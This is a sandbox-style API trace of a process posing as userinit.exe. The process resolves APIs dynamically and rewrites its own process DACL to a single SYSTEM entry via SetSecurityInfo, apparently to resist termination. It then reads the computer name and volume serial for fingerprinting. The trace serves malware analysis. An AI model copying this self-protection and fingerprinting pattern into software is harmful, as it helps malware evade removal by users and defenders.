[0190.665] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297f770, pSourceSid=0x176f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x297f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0190.665] IsValidSid (pSid=0x297f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0190.665] ConvertSidToStringSidA () returned 0x1
[0190.665] LocalFree (hMem=0x16c1c8) returned 0x0
[0190.665] LocalFree (hMem=0x176f70) returned 0x0
[0190.665] ConvertStringSidToSidA () returned 0x1
[0190.665] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297f7f8, pSourceSid=0x176f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x297f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0190.665] IsValidSid (pSid=0x297f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0190.665] ConvertSidToStringSidA () returned 0x1
[0190.665] LocalFree (hMem=0x16c1c8) returned 0x0
[0190.665] LocalFree (hMem=0x176f40) returned 0x0
[0190.665] ConvertStringSidToSidA () returned 0x1
[0190.665] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297f880, pSourceSid=0x176f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x297f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0190.665] IsValidSid (pSid=0x297f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0190.665] ConvertSidToStringSidA () returned 0x1
[0190.665] LocalFree (hMem=0x176f58) returned 0x0
[0190.665] LocalFree (hMem=0x176f40) returned 0x0
[0190.665] ConvertStringSidToSidA () returned 0x1
[0190.665] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297f90c, pSourceSid=0x176f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x297f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0190.665] IsValidSid (pSid=0x297f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0190.665] ConvertSidToStringSidA () returned 0x1
[0190.665] LocalFree (hMem=0x176f58) returned 0x0
[0190.665] LocalFree (hMem=0x176f40) returned 0x0
[0190.665] ConvertStringSidToSidA () returned 0x1
[0190.665] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297f998, pSourceSid=0x176f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x297f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0190.665] IsValidSid (pSid=0x297f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0190.665] ConvertSidToStringSidA () returned 0x1
[0190.665] LocalFree (hMem=0x176f58) returned 0x0
[0190.665] LocalFree (hMem=0x176f40) returned 0x0
[0190.665] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.665] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0190.665] GetCurrentThread () returned 0xfffffffe
[0190.666] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.666] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0190.666] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x8e5bc | out: TokenHandle=0x8e5bc*=0x2853756) returned 0
[0190.666] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.666] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0190.666] GetCurrentProcess () returned 0xffffffff
[0190.666] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.666] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0190.666] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x297fa3c | out: TokenHandle=0x297fa3c*=0x1d0) returned 1
[0190.666] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.666] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0190.666] MapGenericMask (in: AccessMask=0x8e434, GenericMapping=0x8e438 | out: AccessMask=0x8e434)
[0190.667] MapGenericMask (in: AccessMask=0x8e568, GenericMapping=0x8e56c | out: AccessMask=0x8e568)
[0190.667] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.667] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0190.667] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x8e57c | out: TokenInformation=0x0, ReturnLength=0x8e57c) returned 0
[0190.667] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.667] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0190.667] GetLastError () returned 0x7a
[0190.667] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.667] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0190.667] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x170780, TokenInformationLength=0x24, ReturnLength=0x8e5a0 | out: TokenInformation=0x170780, ReturnLength=0x8e5a0) returned 1
[0190.667] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297fab0, pSourceSid=0x170788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x297fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0190.667] IsValidSid (pSid=0x297fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0190.667] ConvertSidToStringSidA () returned 0x1
[0190.667] LocalFree (hMem=0x169e80) returned 0x0
[0190.667] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.668] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0190.668] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297fb34, pSourceSid=0x297fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x297fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0190.668] IsValidSid (pSid=0x297fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0190.668] ConvertSidToStringSidA () returned 0x1
[0190.668] LocalFree (hMem=0x169e80) returned 0x0
[0190.668] IsValidSid (pSid=0x297fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0190.668] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.668] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0190.668] CloseHandle (hObject=0x1d0) returned 1
[0190.668] ConvertStringSidToSidA () returned 0x1
[0190.668] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297fa54, pSourceSid=0x176f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x297fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0190.668] IsValidSid (pSid=0x297fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0190.668] ConvertSidToStringSidA () returned 0x1
[0190.668] LocalFree (hMem=0x176f58) returned 0x0
[0190.668] LocalFree (hMem=0x176f40) returned 0x0
[0190.668] ConvertStringSidToSidA () returned 0x1
[0190.668] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297fae0, pSourceSid=0x176f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x297fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0190.668] IsValidSid (pSid=0x297fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0190.668] ConvertSidToStringSidA () returned 0x1
[0190.668] LocalFree (hMem=0x176f58) returned 0x0
[0190.668] LocalFree (hMem=0x176f40) returned 0x0
[0190.668] ConvertStringSidToSidA () returned 0x1
[0190.668] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297fbfc, pSourceSid=0x176f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x297fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0190.668] IsValidSid (pSid=0x297fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0190.668] ConvertSidToStringSidA () returned 0x1
[0190.668] LocalFree (hMem=0x176f58) returned 0x0
[0190.668] LocalFree (hMem=0x176f40) returned 0x0
[0190.668] ConvertStringSidToSidA () returned 0x1
[0190.668] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297fc8c, pSourceSid=0x176f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x297fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0190.669] IsValidSid (pSid=0x297fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0190.669] ConvertSidToStringSidA () returned 0x1
[0190.669] LocalFree (hMem=0x176f58) returned 0x0
[0190.669] LocalFree (hMem=0x176f40) returned 0x0
[0190.669] ConvertStringSidToSidA () returned 0x1
[0190.669] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297fd1c, pSourceSid=0x176f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x297fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0190.669] IsValidSid (pSid=0x297fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0190.669] ConvertSidToStringSidA () returned 0x1
[0190.669] LocalFree (hMem=0x176f58) returned 0x0
[0190.669] LocalFree (hMem=0x176f40) returned 0x0
[0190.669] GetCurrentProcessId () returned 0x80c
[0190.669] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x80c) returned 0x1d0
[0190.669] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.669] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0190.669] GetSecurityInfo () returned 0x0
[0190.672] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.672] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0190.673] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x170f28, pControl=0x8e342, lpdwRevision=0x8e33c | out: pControl=0x8e342, lpdwRevision=0x8e33c) returned 1
[0190.673] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.673] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0190.673] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x170f28, pOwner=0x8e338, lpbOwnerDefaulted=0x8e32c | out: pOwner=0x8e338*=0x0, lpbOwnerDefaulted=0x8e32c) returned 1
[0190.673] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.673] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0190.673] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x170f28, pGroup=0x8e338, lpbGroupDefaulted=0x8e32c | out: pGroup=0x8e338*=0x0, lpbGroupDefaulted=0x8e32c) returned 1
[0190.673] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.673] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0190.673] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x170f28, lpbDaclPresent=0x8e330, pDacl=0x8e324, lpbDaclDefaulted=0x8e32c | out: lpbDaclPresent=0x8e330, pDacl=0x8e324, lpbDaclDefaulted=0x8e32c) returned 1
[0190.673] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.674] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0190.674] IsValidAcl (pAcl=0x170f3c) returned 1
[0190.674] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.674] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0190.674] GetAce (in: pAcl=0x170f3c, dwAceIndex=0x0, pAce=0x8e1c4 | out: pAce=0x8e1c4*=0x170f44) returned 1
[0190.674] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297fe74, pSourceSid=0x170f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x297fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0190.674] IsValidSid (pSid=0x297fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0190.674] ConvertSidToStringSidA () returned 0x1
[0190.674] LocalFree (hMem=0x177018) returned 0x0
[0190.674] GetAce (in: pAcl=0x170f3c, dwAceIndex=0x1, pAce=0x8e1c4 | out: pAce=0x8e1c4*=0x170f5c) returned 1
[0190.674] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297ff60, pSourceSid=0x170f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x297ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0190.674] IsValidSid (pSid=0x297ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0190.674] ConvertSidToStringSidA () returned 0x1
[0190.674] LocalFree (hMem=0x177018) returned 0x0
[0190.674] GetAce (in: pAcl=0x170f3c, dwAceIndex=0x2, pAce=0x8e1c4 | out: pAce=0x8e1c4*=0x170f70) returned 1
[0190.674] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29729c0, pSourceSid=0x170f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x29729c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0190.674] IsValidSid (pSid=0x29729c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0190.674] ConvertSidToStringSidA () returned 0x1
[0190.674] LocalFree (hMem=0x177018) returned 0x0
[0190.674] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.674] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0190.675] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x170f28, lpbSaclPresent=0x8e334, pSacl=0x8e328, lpbSaclDefaulted=0x8e32c | out: lpbSaclPresent=0x8e334, pSacl=0x8e328, lpbSaclDefaulted=0x8e32c) returned 1
[0190.675] LocalFree (hMem=0x170f28) returned 0x0
[0190.675] IsValidSid (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0190.675] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.675] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0190.675] GetLengthSid (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0190.675] GetLastError () returned 0x0
[0190.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.675] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0190.675] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.675] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0190.675] InitializeAcl (in: pAcl=0x177fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x177fa8) returned 1
[0190.675] IsValidSid (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0190.675] GetLengthSid (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0190.675] GetLastError () returned 0x0
[0190.675] IsValidSid (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0190.676] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.676] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0190.676] SetLastError (dwErrCode=0x0)
[0190.676] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.676] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0190.676] GetSidSubAuthorityCount (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x297f615
[0190.676] GetLastError () returned 0x0
[0190.676] IsValidSid (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0190.676] SetLastError (dwErrCode=0x0)
[0190.676] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.676] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0190.676] GetSidIdentifierAuthority (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x297f616
[0190.676] GetLastError () returned 0x0
[0190.676] IsValidSid (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0190.676] IsValidSid (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0190.676] SetLastError (dwErrCode=0x0)
[0190.676] GetSidSubAuthorityCount (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x297f615
[0190.676] GetLastError () returned 0x0
[0190.676] SetLastError (dwErrCode=0x0)
[0190.676] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.677] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0190.677] GetSidSubAuthority (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x297f61c
[0190.677] GetLastError () returned 0x0
[0190.677] IsValidSid (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0190.677] GetLengthSid (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0190.677] GetLastError () returned 0x0
[0190.677] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.677] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0190.677] AddAce (in: pAcl=0x177fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x162f90, nAceListLength=0x14 | out: pAcl=0x177fa8) returned 1
[0190.677] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.677] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0190.677] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0190.677] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0190.677] SetSecurityInfo () returned 0x0
[0190.677] CloseHandle (hObject=0x1d0) returned 1
[0190.677] GetComputerNameA (in: lpBuffer=0x297fd84, nSize=0x8e5fc | out: lpBuffer="CRH2YWU7", nSize=0x8e5fc) returned 1
[0190.678] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4e8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.678] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8e5e4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8e5f8, lpMaximumComponentLength=0x8e5f4, lpFileSystemFlags=0x8e5f0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8e5f8*=0x90c08a66, lpMaximumComponentLength=0x8e5f4*=0xff, lpFileSystemFlags=0x8e5f0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0190.678] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4f0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
